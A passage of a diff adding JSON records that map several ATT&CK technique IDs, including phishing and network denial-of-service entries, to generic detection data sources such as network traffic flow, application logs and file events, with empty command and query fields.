"data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1498.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1566.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1566.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": 
"application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1566", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": 
"application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1565.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file deletion", + "description": "A file was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + 